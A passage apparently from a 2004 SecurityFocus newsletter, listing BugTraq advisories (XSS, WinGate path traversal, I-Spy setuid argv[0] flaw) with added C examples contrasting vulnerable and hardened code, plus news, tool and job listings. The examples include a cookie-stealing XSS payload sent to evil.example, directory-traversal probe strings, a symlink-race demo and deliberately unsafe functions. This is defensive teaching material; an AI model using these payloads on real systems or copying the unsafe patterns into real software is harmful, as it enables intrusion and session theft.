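```c
/* Added example, not esearch's code: symlink attack on a predictable temp
 * file, beside the hardened open(). Paths and contents are constructed. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern: fixed name, O_CREAT|O_TRUNC, no O_EXCL. If the path is
 * a symlink planted by an attacker, the caller's privileges follow it and
 * truncate/overwrite whatever it points at. */
static int unsafe_write_tmp(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Hardened pattern: O_CREAT|O_EXCL fails with EEXIST if anything, including a
 * symlink, already sits at the path. mkstemp() does this plus a random name
 * and is the better choice when the name need not be fixed. */
static int safe_create_tmp(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return -1;               /* errno == EEXIST for a planted symlink */
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n < 0 ? -1 : 0;
}

static int read_small_file(const char *path, char *buf, size_t n)
{
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    size_t got = fread(buf, 1, n - 1, f);
    fclose(f);
    buf[got] = '\0';
    return 0;
}

/* Stage the attack in a private directory. "victim" stands in for any file
 * the updater's user can write; "esearch.tmp" is the predictable temp name an
 * attacker would guess and replace with a symlink. Returns a bitmask:
 * 1 = the unsafe open clobbered the target, 2 = the O_EXCL open refused. */
int symlink_demo(void)
{
    char dir[64], victim[128], tmp[128], content[64];
    snprintf(dir, sizeof dir, "/tmp/esearch-demo-%ld", (long)getpid());
    if (mkdir(dir, 0700) < 0 && errno != EEXIST) {
        snprintf(dir, sizeof dir, "./esearch-demo-%ld", (long)getpid());
        if (mkdir(dir, 0700) < 0 && errno != EEXIST)
            return -1;
    }
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(tmp, sizeof tmp, "%s/esearch.tmp", dir);
    unlink(tmp);                                  /* clean slate on reruns */

    if (unsafe_write_tmp(victim, "original secret\n") != 0)
        return -1;
    if (symlink(victim, tmp) != 0)                /* attacker plants the link */
        return -1;

    int result = 0;
    if (unsafe_write_tmp(tmp, "attacker data\n") == 0 &&
        read_small_file(victim, content, sizeof content) == 0 &&
        strcmp(content, "attacker data\n") == 0)
        result |= 1;

    errno = 0;
    if (safe_create_tmp(tmp, "ignored\n") != 0 && errno == EEXIST)
        result |= 2;

    unlink(tmp);
    unlink(victim);
    rmdir(dir);
    return result;
}

int main(void)
{
    int r = symlink_demo();
    printf("unsafe open clobbered the target: %s\n", (r & 1) ? "yes" : "no");
    printf("O_EXCL open refused the symlink:  %s\n", (r & 2) ? "yes" : "no");
    return r == 3 ? 0 : 1;
}
```

The same race applies to any file the utility later opens by a predictable name, so the fix in practice is mkstemp() (or a private, mode-0700 directory) rather than a cleverer check before open().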
34. Netegrity IdentityMinder Multiple Cross-Site Scripting Vulne...
BugTraq ID: 10645
Remote: Yes
Date Published: Jul 01 2004
Relevant URL: http://www.securityfocus.com/bid/10645
Summary:
Netegrity IdentityMinder is a tool designed for the Microsoft Windows platform to manage and maintain users and user accounts. The tool supports a web based interface for creating and removing users in multi-user environments.
It has been reported that Netegrity IdentityMinder is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.
A remote attacker can exploit these issues by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If an unsuspecting user followed this link, the hostile code would be rendered in their web browser in the security context of the vulnerable site. This may allow for theft of cookie-based authentication credentials as well as actions in the application performed with the victim's session.
35. Qbik WinGate Information Disclosure Vulnerability
BugTraq ID: 10646
Remote: Yes
Date Published: Jul 02 2004
Relevant URL: http://www.securityfocus.com/bid/10646
Summary:
WinGate is reported susceptible to an information disclosure vulnerability in its HTTP proxy server.
An internal web server contained in WinGate improperly allows attackers to read arbitrary files outside of its document root. WinGate by default runs as the LocalSystem account, so this vulnerability allows remote attackers to read system files that only the operating system itself should be able to read.
An attacker can exploit this issue to read arbitrary files contained on the WinGate computer. These files may contain sensitive information that may aid in further attacks.
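The check a built-in web server needs before it maps a request path onto its document root, as an added example that is not WinGate's code: decode percent escapes first, normalise "." and ".." (and backslashes, since the server runs on Windows) lexically, and refuse, rather than clamp, any request that tries to climb above the root. The document root "C:/WinGate/www" and the request strings are constructed for the demo.

```c
/* Added example, not WinGate's code: confining request paths to a document
 * root. Document root and requests below are constructed. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Decode %XX first; a check that only looks for a literal ".." is walked past
 * by "%2e%2e/". Returns -1 on a malformed escape or an embedded NUL (%00). */
static int percent_decode(const char *in, char *out, size_t n)
{
    size_t o = 0;
    for (size_t i = 0; in[i]; i++) {
        if (o + 1 >= n)
            return -1;
        if (in[i] == '%') {
            char hex[3] = { in[i + 1], in[i + 1] ? in[i + 2] : 0, 0 };
            if (!isxdigit((unsigned char)hex[0]) || !isxdigit((unsigned char)hex[1]))
                return -1;
            long v = strtol(hex, NULL, 16);
            if (v == 0)
                return -1;
            out[o++] = (char)v;
            i += 2;
        } else {
            out[o++] = in[i];
        }
    }
    out[o] = '\0';
    return 0;
}

/* Lexically normalise the request: '\\' counts as '/', "." and empty segments
 * are dropped, ".." pops a segment but only while there is one to pop. A
 * climb above the root returns -1 instead of being clamped, because a clamped
 * "../../winnt/win.ini" would silently become a file under the root and hide
 * the probe from the logs. */
int map_to_docroot(const char *docroot, const char *request, char *out, size_t n)
{
    char decoded[1024];
    const char *segs[64];
    int depth = 0;

    if (percent_decode(request, decoded, sizeof decoded) != 0)
        return -1;
    for (char *p = decoded; *p; p++)
        if (*p == '\\')
            *p = '/';
    for (char *tok = strtok(decoded, "/"); tok; tok = strtok(NULL, "/")) {
        if (strcmp(tok, ".") == 0)
            continue;
        if (strcmp(tok, "..") == 0) {
            if (depth == 0)
                return -1;                    /* traversal attempt */
            depth--;
            continue;
        }
        if (depth == 64)
            return -1;
        segs[depth++] = tok;
    }
    int w = snprintf(out, n, "%s", docroot);
    if (w < 0 || (size_t)w >= n)
        return -1;
    size_t used = (size_t)w;
    for (int i = 0; i < depth; i++) {
        w = snprintf(out + used, n - used, "/%s", segs[i]);
        if (w < 0 || (size_t)w >= n - used)
            return -1;
        used += (size_t)w;
    }
    return 0;
}

/* Convenience wrapper with the constructed document root; NULL = refused. */
const char *mapped(const char *request)
{
    static char path[512];
    return map_to_docroot("C:/WinGate/www", request, path, sizeof path) == 0 ? path : NULL;
}

int main(void)
{
    const char *probes[] = {
        "/index.html", "/images/../index.html", "/../../winnt/win.ini",
        "/%2e%2e/%2e%2e/winnt/win.ini", "/..\\..\\winnt\\win.ini", "/a%00.html", NULL
    };
    for (int i = 0; probes[i]; i++) {
        const char *m = mapped(probes[i]);
        printf("%-32s -> %s\n", probes[i], m ? m : "REFUSED");
    }
    return 0;
}
```

A lexical check is the first gate, not the last: the server should still open the file relative to the root and, on platforms that support it, confirm the opened file's canonical path stays under the root, since alternate data streams, 8.3 short names and junctions are not visible to string normalisation.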
36. IBM Informix I-Spy Local Privilege Escalation Vulnerability
BugTraq ID: 10647
Remote: No
Date Published: Jul 02 2004
Relevant URL: http://www.securityfocus.com/bid/10647
Summary:
It is reported that I-Spy is susceptible to a privilege escalation vulnerability in its 'runbin' binary.
The 'runbin' binary uses its argv[0] to determine both the name of the binary to run and the path to that binary. Because argv[0] is supplied by the calling process rather than by the kernel, a caller can set it to any value, independent of the file actually executed. 'runbin' is installed setuid root by default.
A local attacker with interactive access to a computer running an affected version of I-Spy can exploit this to have an attacker-specified binary run as the superuser.
I-Spy version 2.x is reported vulnerable to this issue.
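Why a setuid wrapper must not trust argv[0], as an added example that is not I-Spy's code: the vulnerable derivation takes the target straight from argv[0], so whoever calls execv() chooses both directory and name; the hardened form uses argv[0] only to select a basename from a compiled-in list under a fixed directory. The install directory /opt/ispy/bin and the helper names "onspy" and "ispyd" are hypothetical. The main() re-executes the program via /proc/self/exe with a forged argv[0], which is exactly how the setuid binary would be launched by an attacker (Linux only; the library functions themselves are portable).

```c
/* Added example, not I-Spy's code: deriving an exec target from argv[0]
 * (vulnerable) versus from a fixed allow-list (hardened). Paths and helper
 * names are hypothetical. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define INSTALL_DIR "/opt/ispy/bin"            /* hypothetical install dir */

/* Vulnerable pattern, modelled on the advisory's description: the target is
 * whatever argv[0] says, so the caller controls the path a root process
 * will exec. */
int derive_target_from_argv0(const char *argv0, char *out, size_t n)
{
    int w = snprintf(out, n, "%s", argv0);
    return (w < 0 || (size_t)w >= n) ? -1 : 0;
}

/* Hardened pattern: argv[0] may only name one of a few known helpers, the
 * directory is compiled in, and any '/' is refused so a path cannot be
 * smuggled through the basename. */
static const char *const allowed[] = { "onspy", "ispyd", NULL };   /* hypothetical */

int derive_target_fixed(const char *argv0, char *out, size_t n)
{
    if (strchr(argv0, '/') != NULL)
        return -1;
    for (int i = 0; allowed[i]; i++) {
        if (strcmp(argv0, allowed[i]) == 0) {
            int w = snprintf(out, n, "%s/%s", INSTALL_DIR, allowed[i]);
            return (w < 0 || (size_t)w >= n) ? -1 : 0;
        }
    }
    return -1;
}

/* Convenience wrapper: the path each variant would exec, or NULL if refused. */
const char *wrapper_target(const char *argv0, int hardened)
{
    static char target[256];
    int rc = hardened ? derive_target_fixed(argv0, target, sizeof target)
                      : derive_target_from_argv0(argv0, target, sizeof target);
    return rc == 0 ? target : NULL;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        /* Re-run ourselves with a forged argv[0], as an attacker would launch
         * the setuid wrapper. The file executed is unchanged; only argv[0]
         * lies. */
        char *fake_argv[] = { "/tmp/evil/onspy", "child", NULL };
        execv("/proc/self/exe", fake_argv);     /* returns only on failure */
        perror("execv");
        return 1;
    }
    const char *vuln = wrapper_target(argv[0], 0);
    const char *safe = wrapper_target(argv[0], 1);
    printf("argv[0] as seen by the wrapper: %s\n", argv[0]);
    printf("vulnerable wrapper would exec:  %s\n", vuln ? vuln : "(refused)");
    printf("hardened wrapper would exec:    %s\n", safe ? safe : "(refused)");
    return 0;
}
```

On Linux the wrapper can also compare against readlink("/proc/self/exe") if it genuinely needs to know where it was installed; argv[0] is never that answer.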
37. SCI Photo Chat Server Cross-Site Scripting Vulnerability
BugTraq ID: 10648
Remote: Yes
Date Published: Jul 02 2004
Relevant URL: http://www.securityfocus.com/bid/10648
Summary:
SCI Photo Chat is reported susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
The web server component of SCI Photo Chat returns an error message when it receives an HTTP request for a file that does not exist. This error message includes the complete, unsanitized content of the original request.
A remote attacker can exploit this issue by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If an unsuspecting user followed this link, the hostile code would be rendered in their web browser in the security context of the vulnerable site, which may allow for theft of cookie-based authentication credentials or other attacks.
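Both the Netegrity IdentityMinder and the SCI Photo Chat entries describe the same defect, request data echoed into HTML without encoding. As an added example, not code from either product, here is a minimal "file not found" page generator in the vulnerable form beside the fixed one, with the encoder the fix relies on. The hostile request string and the collection host evil.example are constructed.

```c
/* Added example, not code from IdentityMinder or SCI Photo Chat: a reflected
 * error page with and without HTML escaping. Request strings are constructed. */
#include <stdio.h>
#include <string.h>

/* Encode the five characters that let data break out of an HTML text node or
 * a quoted attribute. Returns 0, or -1 if out is too small. */
int html_escape(const char *in, char *out, size_t n)
{
    size_t o = 0;
    for (; *in; in++) {
        char one[2] = { *in, '\0' };
        const char *rep;
        switch (*in) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t l = strlen(rep);
        if (o + l >= n)
            return -1;
        memcpy(out + o, rep, l);
        o += l;
    }
    out[o] = '\0';
    return 0;
}

/* Vulnerable server: the requested name is copied into the page verbatim. */
int not_found_body_unsafe(const char *requested, char *out, size_t n)
{
    int w = snprintf(out, n, "<html><body>File not found: %s</body></html>", requested);
    return (w < 0 || (size_t)w >= n) ? -1 : 0;
}

/* Fixed server: identical markup, encoded data. */
int not_found_body_safe(const char *requested, char *out, size_t n)
{
    char esc[1024];
    if (html_escape(requested, esc, sizeof esc) != 0)
        return -1;
    int w = snprintf(out, n, "<html><body>File not found: %s</body></html>", esc);
    return (w < 0 || (size_t)w >= n) ? -1 : 0;
}

/* 1 if the body still carries a live <script tag, 0 otherwise. */
int body_has_script_tag(const char *body)
{
    return strstr(body, "<script") != NULL;
}

/* Convenience wrapper: the page either variant would send, or NULL. */
const char *demo_body(const char *requested, int safe)
{
    static char body[2048];
    int rc = safe ? not_found_body_safe(requested, body, sizeof body)
                  : not_found_body_unsafe(requested, body, sizeof body);
    return rc == 0 ? body : NULL;
}

int main(void)
{
    /* Constructed hostile link: the path the victim's browser would request
     * after following the attacker's URL. */
    const char *req = "/nosuch.html?<script>document.location='http://evil.example/?'+document.cookie</script>";
    printf("unsafe: %s\n", demo_body(req, 0));
    printf("safe:   %s\n", demo_body(req, 1));
    return 0;
}
```

Encoding must happen at the point of output, for the context the data lands in: the entity table above is correct for HTML text and quoted attributes, but not for data placed inside a script block or a URL, which need their own encoders.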
III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Gates Defends Microsoft Patch Efforts
By: Patrick Gray
Microsoft chairman downplays the role that unpatched vulnerabilities played in last week's Russian hack attacks.
http://www.securityfocus.com/news/9004
2. Wi-fi hopper guilty of cyber-extortion
By: Kevin Poulsen
FBI agents initially traced threats to a suburban dentist's office, and other spots with unsecured wireless networks.
http://www.securityfocus.com/news/8991
3. Feds urge secrecy over network outages
By: Kevin Poulsen
The Department of Homeland Security wants details of major service outages kept out of the public eye.
http://www.securityfocus.com/news/8966
4. Bagle source code unleashed
By: John Leyden, The Register
Virus writers are distributing viral source code with the latest version of the Bagle virus series, Bagle-AD. Much like its 29 predecessors, Bagle-AD is a mass-mailing worm that is packed using UPX file compression.
http://www.securityfocus.com/news/9059
5. IE workaround a non-starter
By: John Leyden, The Register
Doubts have been raised about the effectiveness of a workaround issued by Microsoft to guard against a potentially devastating vulnerability in IE. Left unchecked the flaw creates a means for hackers to turn popular websites into conduits for viral transmission.
http://www.securityfocus.com/news/9054
6. Spanish Zombie PC virus author jailed
By: John Leyden, The Register
A Spanish man was sent to jail for two years last week after being convicted of virus writing. Óscar López Hinarejos, 26, was also ordered to pay compensation to his victims for writing the Cabronator Trojan.
http://www.securityfocus.com/news/9053
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. mod_auth_nufw 1.0.1
By: Vincent Deffontaines
Relevant URL: http://freshmeat.net/redir/modauthnufw/51307/url_homepage/article.php3
Platforms:
Summary:
mod_auth_nufw is a Single Sign On Apache module which performs secure user identification and authentication, based on the Nufw firewalling suite. Nufw marks all connections of a network with a unique UserID. This module takes advantage of that mark and uses it to transparently identify and authenticate users requiring access to an Apache server.
2. Ettercap v0.7.0 pre2
By: ALoR <alor (at) users.sourceforge (dot) net [email concealed]>
Relevant URL: http://ettercap.sourceforge.net/
Platforms: FreeBSD, Linux, MacOS, NetBSD, Windows 2000, Windows NT, Windows XP
Summary:
Ettercap is a network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like SSH and HTTPS). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.
3. Free CPM Cellular Passwords Manager 1.0
By:
Relevant URL: http://www.mycell.org/megaas/security/V2demos2.asp
Platforms: Java
Summary:
Enter our downloads page to find the free Cellular Passwords Manager, a J2ME program that will manage all your site/account passwords and IDs. The program is PIN protected and simple menu driven.
This program is part of the CAT Cellular Authentication token. The CAT manages the OTPs and Fixed IDs/Passwords accounts.
4. DumpSIS.pl 0.81
By: Jimmy Shah
Relevant URL: http://www.geocities.com/jfldars/DumpSIS.zip
Platforms: Perl (any system supporting perl)
Summary:
Symbian SIS file dumping utility that allows for analysis of potential malware without actual installation of files.
It has been field tested by various antivirus researchers, who used it to help analyze the recent Symbian Cabir worm.
5. CifsPwScanner 1.0.3
By: Patrik Karlsson
Relevant URL: http://www.cqure.net/tools/cifspwscan-bin-1_0_3.tar.gz
Platforms: Java
Summary:
A CIFS/SMB password scanner based on the jcifs implementation. The scanner and jcifs are both 100% pure java, making it possible to run the scanner on a few different platforms.
6. Wasabi 0.2
By: Andrea Barisani
Relevant URL: http://www.gentoo.org/proj/en/infrastructure/wasabi
Platforms: Perl (any system supporting perl)
Summary:
Wasabi is a log monitoring program, designed to watch a log file for lines matching user defined regular expression and report on the matches. The regular expressions are assigned to queues which have an alert interval and a list of mail recipients.
Queues can be set to send a notification as soon as there is a log line assigned to it, or to send periodic reports.
Additionally, uninteresting fields in the log lines (such as PID numbers) can be masked with the standard regular ex
V. SECURITYJOBS LIST SUMMARY
----------------------------
1. IT Auditor vacancy UK (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/368053
2. Seeking Information Security Professionals in NYC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/368030
3. Do you seek an Information Security Expert? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367973
4. Sr. Associate - Threat & Vulnerability Management - ... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367938
5. New to security field (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367936
6. Network Security Engineer, NYC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367934
7. [WANT] Security or Computer/Tech Support Position (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367929
8. Security Engineer job opp. @ Reactivity Inc., Belmo... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367927
9. Seeking security developers (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367926
10. Security SW- Tech support- Cupertino, CA- ArcSight (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367925
11. Information Security with Microsoft emphasis - CA, I... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367920
12. Jr. Level Perimeter Security - New York (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367919
13. Solutions Consultant (SE) - Bay Area (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367917
14. Security Architect - Boston (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367915
15. Summertime Positions in Heidelberg, Germany (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367913
16. MITRE - Information Assurance Architect - Hanover, M... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367912
17. Security Consultants: Wash. D.C. or CA- ArcSight (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367911
18. Security Architect for Federal.- Wash D.C. ArcSight (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367910
19. WEST COAST SALES ENGINEER (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367909
20. Security Engineer - LOS ANGELES, CA - Financial Ins... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367908
21. Director / VP Business Development--Network Securit... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367907
22. IT Security Architect required in the UK (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367906
VI. INCIDENTS LIST SUMMARY
--------------------------
1. Remote registry changes from an ISA server (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/367961
2. Unknown Malware found csdiv.dll (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/367896
3. Scob infection statistics, etc.. (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/367563
VII. VULN-DEV RESEARCH LIST SUMMARY
-----------------------------------
NO NEW POSTS FOR THE WEEK 2004-06-29 to 2004-07-06.
VIII. MICROSOFT FOCUS LIST SUMMARY
----------------------------------
1. supressing IE (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/368056
2. Non Admin Rights + Visual Studio (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/367999
3. Consumer Security Web Site (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/367705
4. Administrivia: Out of Office Autoreplies (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/367638
5. Article Announcement: Redmond's Butterfly Effect (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/367635
6. SecurityFocus Microsoft Newsletter #195 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/367553
7. RE: Consumer Security Web Site (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/367497
IX. SUN FOCUS LIST SUMMARY
--------------------------
1. secure NFS problem (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/367947
X. LINUX FOCUS LIST SUMMARY
---------------------------
1. Weird! (Thread)
Relevant URL:
http://www.securityfocus.com/archive/91/368067
2. Last login missing (Thread)
Relevant URL:
http://www.securityfocus.com/archive/91/368004
3. Error installing Clamav? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/91/368000
4. just running tcpdump makes promisc mode? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/91/367997
XI. UNSUBSCRIBE INSTRUCTIONS
----------------------------
To unsubscribe send an e-mail message to sf-news-unsubscribe (at) securityfocus (dot) com [email concealed] from the subscribed address. The contents of the subject or message body do not matter. You will receive a confirmation request message to which you will have to answer. Alternatively you can also visit http://www.securityfocus.com/newsletters and unsubscribe via the website.
If your email address has changed email listadmin (at) securityfocus (dot) com [email concealed] and ask to be manually removed.
XII. SPONSOR INFORMATION
-----------------------
This issue sponsored by: FaceTime